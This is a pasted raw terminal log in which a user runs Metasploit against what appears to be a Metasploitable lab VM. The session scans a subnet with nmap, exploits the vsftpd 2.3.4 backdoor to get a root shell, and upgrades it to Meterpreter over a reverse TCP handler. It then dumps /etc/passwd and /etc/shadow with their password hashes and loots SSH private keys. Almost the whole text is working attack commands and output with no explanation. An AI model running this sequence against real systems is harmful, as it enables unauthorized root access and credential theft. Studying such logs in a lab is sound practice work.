Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- root@kali:~# service postgresql start
- root@kali:~# sudo msfdb init
- Creating database user 'msf'
- Enter password for new role:
- Enter it again:
- Creating databases 'msf' and 'msf_test'
- Creating configuration file in /usr/share/metasploit-framework/config/database.yml
- Creating initial database schema
- root@kali:~# msfconsole
- Metasploit Park, System Security Interface
- Version 4.0.5, Alpha E
- Ready...
- > access security
- access: PERMISSION DENIED.
- > access security grid
- access: PERMISSION DENIED.
- > access main security grid
- access: PERMISSION DENIED....and...
- YOU DIDN'T SAY THE MAGIC WORD!
- YOU DIDN'T SAY THE MAGIC WORD!
- YOU DIDN'T SAY THE MAGIC WORD!
- YOU DIDN'T SAY THE MAGIC WORD!
- YOU DIDN'T SAY THE MAGIC WORD!
- YOU DIDN'T SAY THE MAGIC WORD!
- YOU DIDN'T SAY THE MAGIC WORD!
- =[ metasploit v4.16.6-dev ]
- + -- --=[ 1682 exploits - 964 auxiliary - 297 post ]
- + -- --=[ 498 payloads - 40 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- msf > db_status
- [*] postgresql connected to msf
- msf > show workspace
- [-] Invalid parameter "workspace", use "show -h" for more information
- msf > show -h
- [*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, plugins, info, options
- [*] Additional module-specific parameters are: missing, advanced, evasion, targets, actions
- msf > workspace
- * default
- msf > workspace meta
- [-] Workspace not found: meta
- msf > workspace -a meta
- [*] Added workspace: meta
- msf > workspace meta
- [*] Workspace: meta
- msf > db_nmap
- [*] Usage: db_nmap [--save | [--help | -h]] [nmap options]
- msf > db_nmap --save
- [*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-21 14:58 CET
- [*] Nmap: 'WARNING: No targets were specified, so 0 hosts scanned.'
- [*] Nmap: Nmap done: 0 IP addresses (0 hosts up) scanned in 0.06 seconds
- [*] Saved NMAP XML results to /root/.msf4/local/msf-db-nmap-20171121-1658-1sonodp.xml
- msf > db_nmap --save -sT 10.0.2.0/24 -p 0-50
- [*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-21 14:59 CET
- [*] Nmap: Nmap scan report for 10.0.2.1
- [*] Nmap: Host is up (-0.20s latency).
- [*] Nmap: All 51 scanned ports on 10.0.2.1 are filtered
- [*] Nmap: MAC Address: 08:00:27:46:05:09 (Oracle VirtualBox virtual NIC)
- [*] Nmap: Nmap scan report for 10.0.2.2
- [*] Nmap: Host is up (0.00038s latency).
- [*] Nmap: Not shown: 47 closed ports
- [*] Nmap: PORT STATE SERVICE
- [*] Nmap: 21/tcp open ftp
- [*] Nmap: 22/tcp open ssh
- [*] Nmap: 23/tcp open telnet
- [*] Nmap: 25/tcp open smtp
- [*] Nmap: MAC Address: 08:00:27:21:D6:69 (Oracle VirtualBox virtual NIC)
- [*] Nmap: Nmap scan report for 10.0.2.3
- [*] Nmap: Host is up (0.000071s latency).
- [*] Nmap: All 51 scanned ports on 10.0.2.3 are closed
- [*] Nmap: Nmap done: 256 IP addresses (3 hosts up) scanned in 33.33 seconds
- [*] Saved NMAP XML results to /root/.msf4/local/msf-db-nmap-20171121-1658-1t23job.xml
- msf > services -S ftp [10.0.2.2]
- [-] Invalid host parameter, [10.0.2.2].
- msf > services -S ftp 10.0.2.2
- Services
- ========
- host port proto name state info
- ---- ---- ----- ---- ----- ----
- 10.0.2.2 21 tcp ftp open
- msf > use
- Usage: use module_name
- The use command is used to interact with a module of a given name.
- msf > use exploit
- [-] Failed to load module: exploit
- msf > use exploit/
- Display all 1682 possibilities? (y or n)
- msf > use exploit/unix/ftp/
- use exploit/unix/ftp/proftpd_133c_backdoor
- use exploit/unix/ftp/proftpd_modcopy_exec
- use exploit/unix/ftp/vsftpd_234_backdoor
- msf > use exploit/unix/ftp/vsftpd_234_backdoor
- msf exploit(vsftpd_234_backdoor) > show targets
- Exploit targets:
- Id Name
- -- ----
- 0 Automatic
- msf exploit(vsftpd_234_backdoor) > cd..
- [-] Unknown command: cd...
- msf exploit(vsftpd_234_backdoor) > exit
- root@kali:~# msfconsole
- _---------.
- .' ####### ;."
- .---,. ;@ @@`; .---,..
- ." @@@@@'.,'@@ @@@@@',.'@@@@ ".
- '-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
- `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
- "--'.@@@ -.@ @ ,'- .'--"
- ".@' ; @ @ `. ;'
- |@@@@ @@@ @ .
- ' @@@ @@ @@ ,
- `.@@@@ @@ .
- ',@@ @ ; _____________
- ( 3 C ) /|___ / Metasploit! \
- ;@'. __*__,." \|--- \_____________/
- '(.,...."/
- =[ metasploit v4.16.6-dev ]
- + -- --=[ 1682 exploits - 964 auxiliary - 297 post ]
- + -- --=[ 498 payloads - 40 encoders - 10 nops ]
- + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
- msf > db_status
- [*] postgresql connected to msf
- msf > hosts
- Hosts
- =====
- address mac name os_name os_flavor os_sp purpose info comments
- ------- --- ---- ------- --------- ----- ------- ---- --------
- msf > services -S ftp 10.0.2.2 --save
- [-] Invalid host parameter, --save.
- msf > db_nmap
- [*] Usage: db_nmap [--save | [--help | -h]] [nmap options]
- msf > db_nmap --save -sT 10.0.2.0/24 -p 0-50
- [*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-21 15:07 CET
- [*] Nmap: Nmap scan report for 10.0.2.1
- [*] Nmap: Host is up (-0.20s latency).
- [*] Nmap: All 51 scanned ports on 10.0.2.1 are filtered
- [*] Nmap: MAC Address: 08:00:27:46:05:09 (Oracle VirtualBox virtual NIC)
- [*] Nmap: Nmap scan report for 10.0.2.2
- [*] Nmap: Host is up (0.00035s latency).
- [*] Nmap: Not shown: 47 closed ports
- [*] Nmap: PORT STATE SERVICE
- [*] Nmap: 21/tcp open ftp
- [*] Nmap: 22/tcp open ssh
- [*] Nmap: 23/tcp open telnet
- [*] Nmap: 25/tcp open smtp
- [*] Nmap: MAC Address: 08:00:27:21:D6:69 (Oracle VirtualBox virtual NIC)
- [*] Nmap: Nmap scan report for 10.0.2.3
- [*] Nmap: Host is up (0.000084s latency).
- [*] Nmap: All 51 scanned ports on 10.0.2.3 are closed
- [*] Nmap: Nmap done: 256 IP addresses (3 hosts up) scanned in 33.47 seconds
- [*] Saved NMAP XML results to /root/.msf4/local/msf-db-nmap-20171121-1913-mharu5.xml
- msf > hosts
- Hosts
- =====
- address mac name os_name os_flavor os_sp purpose info comments
- ------- --- ---- ------- --------- ----- ------- ---- --------
- 10.0.2.2 08:00:27:21:d6:69 Unknown device
- msf > services
- Services
- ========
- host port proto name state info
- ---- ---- ----- ---- ----- ----
- 10.0.2.2 21 tcp ftp open
- 10.0.2.2 22 tcp ssh open
- 10.0.2.2 23 tcp telnet open
- 10.0.2.2 25 tcp smtp open
- msf > services -S ftp 10.0.2.2
- Services
- ========
- host port proto name state info
- ---- ---- ----- ---- ----- ----
- 10.0.2.2 21 tcp ftp open
- msf > use exploit/unix/ftp/vsftpd_234_backdoor
- msf exploit(vsftpd_234_backdoor) > show targets
- Exploit targets:
- Id Name
- -- ----
- 0 Automatic
- msf exploit(vsftpd_234_backdoor) > set rhost
- [-] Unknown variable
- Usage: set [option] [value]
- Set the given option to value. If value is omitted, print the current value.
- If both are omitted, print options that are currently set.
- If run from a module context, this will set the value in the module's
- datastore. Use -g to operate on the global datastore
- msf exploit(vsftpd_234_backdoor) > set rhost 10.0.2.2
- rhost => 10.0.2.2
- msf exploit(vsftpd_234_backdoor) > options
- Module options (exploit/unix/ftp/vsftpd_234_backdoor):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- RHOST 10.0.2.2 yes The target address
- RPORT 21 yes The target port (TCP)
- Exploit target:
- Id Name
- -- ----
- 0 Automatic
- msf exploit(vsftpd_234_backdoor) > check
- [*] 10.0.2.2:21 This module does not support check.
- msf exploit(vsftpd_234_backdoor) > info exploit/unix/ftp/
- info exploit/unix/ftp/proftpd_133c_backdoor
- info exploit/unix/ftp/proftpd_modcopy_exec
- info exploit/unix/ftp/vsftpd_234_backdoor
- msf exploit(vsftpd_234_backdoor) > info exploit/unix/ftp/vsftpd_234_backdoor
- Name: VSFTPD v2.3.4 Backdoor Command Execution
- Module: exploit/unix/ftp/vsftpd_234_backdoor
- Platform: Unix
- Privileged: Yes
- License: Metasploit Framework License (BSD)
- Rank: Excellent
- Disclosed: 2011-07-03
- Provided by:
- hdm <x@hdm.io>
- MC <mc@metasploit.com>
- Available targets:
- Id Name
- -- ----
- 0 Automatic
- Basic options:
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- RHOST yes The target address
- RPORT 21 yes The target port (TCP)
- Payload information:
- Space: 2000
- Avoid: 0 characters
- Description:
- This module exploits a malicious backdoor that was added to the
- VSFTPD download archive. This backdoor was introduced into the
- vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011
- according to the most recent information available. This backdoor
- was removed on July 3rd 2011.
- References:
- OSVDB (73573)
- http://pastebin.com/AetT9sS5
- http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
- msf exploit(vsftpd_234_backdoor) > show payloads
- Compatible Payloads
- ===================
- Name Disclosure Date Rank Description
- ---- --------------- ---- -----------
- cmd/unix/interact normal Unix Command, Interact with Established Connection
- msf exploit(vsftpd_234_backdoor) > set payload cmd/unix/interact
- payload => cmd/unix/interact
- msf exploit(vsftpd_234_backdoor) > show options
- Module options (exploit/unix/ftp/vsftpd_234_backdoor):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- RHOST 10.0.2.2 yes The target address
- RPORT 21 yes The target port (TCP)
- Payload options (cmd/unix/interact):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Exploit target:
- Id Name
- -- ----
- 0 Automatic
- msf exploit(vsftpd_234_backdoor) > exploit
- [*] 10.0.2.2:21 - Banner: 220 (vsFTPd 2.3.4)
- [*] 10.0.2.2:21 - USER: 331 Please specify the password.
- [+] 10.0.2.2:21 - Backdoor service has been spawned, handling...
- [+] 10.0.2.2:21 - UID: uid=0(root) gid=0(root)
- [*] Found shell.
- [*] Command shell session 1 opened (10.0.2.3:42357 -> 10.0.2.2:6200) at 2017-11-21 15:18:50 +0100
- uname -a
- Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
- ^Z
- Background session 1? [y/N] y
- msf exploit(vsftpd_234_backdoor) > sessions
- Active sessions
- ===============
- Id Type Information Connection
- -- ---- ----------- ----------
- 1 shell cmd/unix 10.0.2.3:42357 -> 10.0.2.2:6200 (10.0.2.2)
- msf exploit(vsftpd_234_backdoor) > post/multi/manage/shell_to_meterpreter
- [-] Unknown command: post/multi/manage/shell_to_meterpreter.
- msf exploit(vsftpd_234_backdoor) > postexploitation post/multi/manage/shell_to_meterpreter
- [-] Unknown command: postexploitation.
- msf exploit(vsftpd_234_backdoor) > run post/multi/manage/shell_to_meterpreter
- [*] 10.0.2.2:21 - The port used by the backdoor bind listener is already open
- [-] 10.0.2.2:21 - The service on port 6200 does not appear to be a shell
- [*] Exploit completed, but no session was created.
- msf exploit(vsftpd_234_backdoor) > use post/multi/manage/shell_to_meterpretermsf post(shell_to_meterpreter) > show options
- Module options (post/multi/manage/shell_to_meterpreter):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- HANDLER true yes Start an exploit/multi/handler to receive the connection
- LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
- LPORT 4433 yes Port for payload to connect to.
- SESSION yes The session to run this module on.
- msf post(shell_to_meterpreter) > sessions
- Active sessions
- ===============
- Id Type Information Connection
- -- ---- ----------- ----------
- 1 shell cmd/unix 10.0.2.3:42357 -> 10.0.2.2:6200 (10.0.2.2)
- msf post(shell_to_meterpreter) > set session 1
- session => 1
- msf post(shell_to_meterpreter) > show options
- Module options (post/multi/manage/shell_to_meterpreter):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- HANDLER true yes Start an exploit/multi/handler to receive the connection
- LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
- LPORT 4433 yes Port for payload to connect to.
- SESSION 1 yes The session to run this module on.
- msf post(shell_to_meterpreter) > run postexploitation
- [*] Upgrading session ID: 1
- [*] Starting exploit/multi/handler
- [*] Started reverse TCP handler on 10.0.2.3:4433
- [*] Sending stage (826872 bytes) to 10.0.2.2
- [*] Meterpreter session 2 opened (10.0.2.3:4433 -> 10.0.2.2:46390) at 2017-11-21 15:29:00 +0100
- [*] Command stager progress: 100.00% (736/736 bytes)
- [*] Post module execution completed
- msf post(shell_to_meterpreter) > sessions
- Active sessions
- ===============
- Id Type Information Connection
- -- ---- ----------- ----------
- 1 shell cmd/unix 10.0.2.3:42357 -> 10.0.2.2:6200 (10.0.2.2)
- 2 meterpreter x86/linux uid=0, gid=0, euid=0, egid=0 @ metasploitable.localdomain 10.0.2.3:4433 -> 10.0.2.2:46390 (10.0.2.2)
- msf post(shell_to_meterpreter) > sessions -i 2
- [*] Starting interaction with 2...
- meterpreter > sysinfo
- Computer : metasploitable.localdomain
- OS : Ubuntu 8.04 (Linux 2.6.24-16-server)
- Architecture : i686
- Meterpreter : x86/linux
- meterpreter > cat /etc/passwd
- root:x:0:0:root:/root:/bin/bash
- daemon:x:1:1:daemon:/usr/sbin:/bin/sh
- bin:x:2:2:bin:/bin:/bin/sh
- sys:x:3:3:sys:/dev:/bin/sh
- sync:x:4:65534:sync:/bin:/bin/sync
- games:x:5:60:games:/usr/games:/bin/sh
- man:x:6:12:man:/var/cache/man:/bin/sh
- lp:x:7:7:lp:/var/spool/lpd:/bin/sh
- mail:x:8:8:mail:/var/mail:/bin/sh
- news:x:9:9:news:/var/spool/news:/bin/sh
- uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
- proxy:x:13:13:proxy:/bin:/bin/sh
- www-data:x:33:33:www-data:/var/www:/bin/sh
- backup:x:34:34:backup:/var/backups:/bin/sh
- list:x:38:38:Mailing List Manager:/var/list:/bin/sh
- irc:x:39:39:ircd:/var/run/ircd:/bin/sh
- gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
- nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
- libuuid:x:100:101::/var/lib/libuuid:/bin/sh
- dhcp:x:101:102::/nonexistent:/bin/false
- syslog:x:102:103::/home/syslog:/bin/false
- klog:x:103:104::/home/klog:/bin/false
- sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
- msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
- bind:x:105:113::/var/cache/bind:/bin/false
- postfix:x:106:115::/var/spool/postfix:/bin/false
- ftp:x:107:65534::/home/ftp:/bin/false
- postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
- mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
- tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
- distccd:x:111:65534::/:/bin/false
- user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
- service:x:1002:1002:,,,:/home/service:/bin/bash
- telnetd:x:112:120::/nonexistent:/bin/false
- proftpd:x:113:65534::/var/run/proftpd:/bin/false
- statd:x:114:65534::/var/lib/nfs:/bin/false
- meterpreter > cat /etc/passwd
- root:x:0:0:root:/root:/bin/bash
- daemon:x:1:1:daemon:/usr/sbin:/bin/sh
- bin:x:2:2:bin:/bin:/bin/sh
- sys:x:3:3:sys:/dev:/bin/sh
- sync:x:4:65534:sync:/bin:/bin/sync
- games:x:5:60:games:/usr/games:/bin/sh
- man:x:6:12:man:/var/cache/man:/bin/sh
- lp:x:7:7:lp:/var/spool/lpd:/bin/sh
- mail:x:8:8:mail:/var/mail:/bin/sh
- news:x:9:9:news:/var/spool/news:/bin/sh
- uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
- proxy:x:13:13:proxy:/bin:/bin/sh
- www-data:x:33:33:www-data:/var/www:/bin/sh
- backup:x:34:34:backup:/var/backups:/bin/sh
- list:x:38:38:Mailing List Manager:/var/list:/bin/sh
- irc:x:39:39:ircd:/var/run/ircd:/bin/sh
- gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
- nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
- libuuid:x:100:101::/var/lib/libuuid:/bin/sh
- dhcp:x:101:102::/nonexistent:/bin/false
- syslog:x:102:103::/home/syslog:/bin/false
- klog:x:103:104::/home/klog:/bin/false
- sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
- msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
- bind:x:105:113::/var/cache/bind:/bin/false
- postfix:x:106:115::/var/spool/postfix:/bin/false
- ftp:x:107:65534::/home/ftp:/bin/false
- postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
- mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
- tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
- distccd:x:111:65534::/:/bin/false
- user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
- service:x:1002:1002:,,,:/home/service:/bin/bash
- telnetd:x:112:120::/nonexistent:/bin/false
- proftpd:x:113:65534::/var/run/proftpd:/bin/false
- statd:x:114:65534::/var/lib/nfs:/bin/false
- meterpreter > cat /etc/shadow
- root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
- daemon:*:14684:0:99999:7:::
- bin:*:14684:0:99999:7:::
- sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
- sync:*:14684:0:99999:7:::
- games:*:14684:0:99999:7:::
- man:*:14684:0:99999:7:::
- lp:*:14684:0:99999:7:::
- mail:*:14684:0:99999:7:::
- news:*:14684:0:99999:7:::
- uucp:*:14684:0:99999:7:::
- proxy:*:14684:0:99999:7:::
- www-data:*:14684:0:99999:7:::
- backup:*:14684:0:99999:7:::
- list:*:14684:0:99999:7:::
- irc:*:14684:0:99999:7:::
- gnats:*:14684:0:99999:7:::
- nobody:*:14684:0:99999:7:::
- libuuid:!:14684:0:99999:7:::
- dhcp:*:14684:0:99999:7:::
- syslog:*:14684:0:99999:7:::
- klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
- sshd:*:14684:0:99999:7:::
- msfadmin:$1$hnf7AqmR$ESi6MmmnGxZQ2Xk5N2xSq0:17487:0:99999:7:::
- bind:*:14685:0:99999:7:::
- postfix:*:14685:0:99999:7:::
- ftp:*:14685:0:99999:7:::
- postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
- mysql:!:14685:0:99999:7:::
- tomcat55:*:14691:0:99999:7:::
- distccd:*:14698:0:99999:7:::
- user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
- service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
- telnetd:*:14715:0:99999:7:::
- proftpd:!:14727:0:99999:7:::
- statd:*:15474:0:99999:7:::
- meterpreter >
- Background session 2? [y/N]
- msf post(shell_to_meterpreter) > use post/multi/gather/ssh_creds
- msf post(ssh_creds) > options
- Module options (post/multi/gather/ssh_creds):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- SESSION yes The session to run this module on.
- msf post(ssh_creds) > session 1
- [-] Unknown command: session.
- msf post(ssh_creds) > set session 1
- session => 1
- msf post(ssh_creds) > session 1
- [-] Unknown command: session.
- msf post(ssh_creds) > set session 1
- session => 1
- msf post(ssh_creds) > options
- Module options (post/multi/gather/ssh_creds):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- SESSION 1 yes The session to run this module on.
- msf post(ssh_creds) > run postexploitation
- [*] Finding .ssh directories
- [*] Looting 3 directories
- [+] Downloaded /home/msfadmin/.ssh/authorized_keys -> /root/.msf4/loot/20171121153305_default_10.0.2.2_ssh.authorized_k_467319.txt
- [-] Could not load SSH Key: Neither PUB key nor PRIV key
- [+] Downloaded /home/msfadmin/.ssh/id_rsa -> /root/.msf4/loot/20171121153306_default_10.0.2.2_ssh.id_rsa_189943.txt
- [+] Downloaded /home/msfadmin/.ssh/id_rsa.pub -> /root/.msf4/loot/20171121153306_default_10.0.2.2_ssh.id_rsa.pub_614578.txt
- [-] Could not load SSH Key: Neither PUB key nor PRIV key
- [+] Downloaded /home/user/.ssh/id_dsa -> /root/.msf4/loot/20171121153307_default_10.0.2.2_ssh.id_dsa_183298.txt
- [+] Downloaded /home/user/.ssh/id_dsa.pub -> /root/.msf4/loot/20171121153307_default_10.0.2.2_ssh.id_dsa.pub_979685.txt
- [-] Could not load SSH Key: Neither PUB key nor PRIV key
- [+] Downloaded /root/.ssh/authorized_keys -> /root/.msf4/loot/20171121153308_default_10.0.2.2_ssh.authorized_k_630265.txt
- [-] Could not load SSH Key: Neither PUB key nor PRIV key
- [+] Downloaded /root/.ssh/known_hosts -> /root/.msf4/loot/20171121153308_default_10.0.2.2_ssh.known_hosts_814874.txt
- [-] Could not load SSH Key: Neither PUB key nor PRIV key
- [*] Post module execution completed
- msf post(ssh_creds) > creds
- Credentials
- ===========
- host origin service public private realm private_type
- ---- ------ ------- ------ ------- ----- ------------
- msfadmin 57:c3:11:5d:77:c5:63:90:33:2d:c5:c4:99:78:62:7a SSH key
- user 70:ff:0f:ff:a3:8e:39:18:d7:30:c1:30:02:bc:20:3c SSH key
- msf post(ssh_creds) > exit
- [*] You have active sessions open, to exit anyway type "exit -y"
- msf post(ssh_creds) > session -k 1
- [-] Unknown command: session.
- msf post(ssh_creds) > sessions -k 1
- [*] Killing the following session(s): 1
- [*] Killing session 1
- [*] 10.0.2.2 - Command shell session 1 closed.
- msf post(ssh_creds) > sessions -k 2
- [*] Killing the following session(s): 2
- [*] Killing session 2
- [*] 10.0.2.2 - Meterpreter session 2 closed.
- msf post(ssh_creds) > exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement